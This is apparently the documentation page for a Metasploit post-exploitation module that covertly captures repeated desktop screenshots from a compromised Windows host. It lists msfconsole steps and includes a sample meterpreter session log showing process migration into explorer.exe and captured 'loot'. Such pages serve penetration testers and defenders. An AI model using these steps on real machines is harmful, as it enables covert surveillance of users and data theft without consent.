h00die
1.3 KiB
1.3 KiB
Vulnerable Application
This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction.
Note: As of March, 2014, the VIEW_CMD option
has been removed in favor of the Boolean VIEW_SCREENSHOTS option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/screen_spy - Do:
set SESSION <session id> - Do:
run
Options
SESSION
The session to run the module on.
Scenarios
Windows 7 (6.1 Build 7601, Service Pack 1).
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
msf > use post/windows/gather/screen_spy
msf post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf post(windows/gather/screen_spy) > run
[*] Migrating to explorer.exe pid: 1908
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed